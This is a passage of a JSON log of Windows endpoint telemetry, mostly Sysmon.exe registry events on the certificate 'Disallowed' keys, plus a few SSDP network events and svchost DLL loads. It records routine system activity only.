"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "destination_address": "239.255.255.250", - "destination_port": "1900", - "event_type": "network", - "pid": 1156, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "127.0.0.1", - "source_port": "56578", - "subtype": "outgoing", - "timestamp": 131883570878990000, - "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - 
"user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "destination_address": "127.0.0.1", - "destination_port": "56578", - "event_type": "network", - "pid": 1156, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "239.255.255.250", - "source_port": "1900", - "subtype": "incoming", - "timestamp": 131883570879000000, - "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "usermgrcli.dll", - "image_path": "C:\\Windows\\System32\\usermgrcli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ExecModelClient.dll", - "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 